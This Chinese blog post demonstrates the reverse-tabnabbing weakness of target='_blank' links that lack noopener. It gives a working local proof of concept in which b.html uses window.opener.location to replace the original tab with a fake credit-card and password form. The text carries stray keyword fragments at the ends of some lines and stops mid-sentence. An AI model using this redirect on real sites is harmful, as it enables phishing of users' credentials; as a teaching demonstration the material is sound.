實戰重現隱藏在A標籤_blank下的危險漏洞,簡略說明noopener的做用

時間 2019-12-08

標籤實戰重現隱藏標籤 blank 危險漏洞簡略說明 noopener 简体版

原文原文鏈接

前幾日，在看阮一峯老師的博客文章中，發現了這麼一篇。標題爲《target = "_blank" 的危險性（英文）》。這篇文章同事看過以後由於不理解其中的危險之處，念念不忘，因而這裏咱們來重現一下這個漏洞。html

首先作點準備：chrome

準備兩個域名 a.com b.com 分別解析到 127.0.0.1
準備好兩個域名對應的http服務
chrome瀏覽器

正式開始瀏覽器

首先在a.com下創建1.html 寫入代碼oop

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
		
    </head>
    <body>
		<input type="text" value="信用卡+密碼錶單">
		<a href="http://b.com/b.html" target="_blank" >B站</a>
    </body>
</html>

　　在代碼中，咱們創建了一個A標籤，連接到B站點，地址爲 http://b.com/b.html 打開方式爲新標籤頁打開也就是target="_blank"網站

將這個1.html文件複製一份到b站點的目錄中並修改代碼爲url

 1 <!DOCTYPE html>
 2 <html>
 3     <head>
 4         <meta charset="UTF-8">
 5         <meta name="viewport" content="width=device-width, initial-scale=1.0">
 6         
 7     </head>
 8     <body>
 9         <input type="text" value="信用卡+密碼錶單+釣魚頁面">
10         <a href="http://b.com/b.html" target="_blank" >B站</a>
11     </body>
12 </html>

注意紅色部分，這裏是爲了區分第一個頁面加的標記。準備好之後再創建一個b.html知足A標籤的目標文件。spa

代碼爲code

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <script>
            function dosth(){
                window.opener.location = "http://b.com/1.html";
                alert("OK");
            }
        </script>
    </head>
    <body>
        <p>B站</p>
        <button type="button" onclick="dosth();">js</button>

    </body>
</html>

　　至此代碼準備完畢，開始重現漏洞觸發過程htm

打開Chrome ，當前版本爲blog